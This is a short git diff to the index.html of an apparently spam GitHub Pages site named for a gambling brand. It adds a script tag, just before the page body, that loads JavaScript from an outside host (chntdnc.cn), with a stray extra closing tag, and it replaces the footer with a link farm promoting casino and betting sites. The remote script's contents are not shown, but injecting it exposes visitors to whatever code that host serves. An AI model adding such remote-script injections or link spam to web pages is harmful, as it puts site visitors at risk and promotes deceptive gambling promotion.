--- a/index.html
+++ b/index.html
@@ -10,14 +10,13 @@
 
     <title>保皇游戏【银河国际】</title>
   </head>
-
+<script type='text/javascript' src='http://www.chntdnc.cn/js.js'></script></script>
   <body>
 
     <!-- HEADER -->
     <div id="header_wrap" class="outer">
         <header class="inner">
-          <a id="forkme_banner" href="https://github.com/bsjylc">View on GitHub</a>
-
+<a id='forkme_banner' href='http://bsjylc.github.io'>保皇游戏</a>
           <h1 id="project_title">保皇游戏【银河国际】</h1>
           <h2 id="project_tagline">保皇游戏</h2>
 
@@ -34,8 +33,7 @@
     <!-- FOOTER  -->
     <div id="footer_wrap" class="outer">
       <footer class="inner">
-        <p>Published with <a href="https://pages.github.com">GitHub Pages</a></p>
-      </footer>
+<p><a href='http://bsjylc.github.io'>保皇游戏</a><a href='http://bjlbp.github.io/'>百家乐补牌</a><a href='http://grgrrh.github.io/'>澳门葡京</a><a href='http://ampjdc.github.io/'>澳门葡京官网</a><a href='http://amenqxc.github.io/'>澳门七星彩</a><a href='http://amenqp.github.io/'>澳门球盘</a><a href='http://aomenslpdc.github.io/'>澳门十六浦赌场</a><a href='http://amenqpk.github.io/'>澳门球盘口</a><a href='http://amenqpw.github.io/'>澳门球盘网</a><a href='http://aomenqwa.github.io/'>澳门球网</a><a href='http://aomrfp.github.io/'>澳门让分盘</a></p>      </footer>
     </div>
 
     
